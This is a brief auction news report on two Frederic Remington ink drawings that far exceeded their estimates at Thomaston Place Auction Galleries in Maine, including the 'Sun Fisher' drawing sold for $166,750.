THOMASTON, MAINE — A pair of original ink drawings by Frederic Remington soared well past their $20/30,000 estimates to total just over $350,000, including the buyer’s premium at Thomaston Place Auction Galleries on Saturday, November 9.

The first across the block, lot 205, was Remington’s drawing “Sun Fisher” marked with an 1890 copyright (not published until 1895 however), which fetched $166,750.
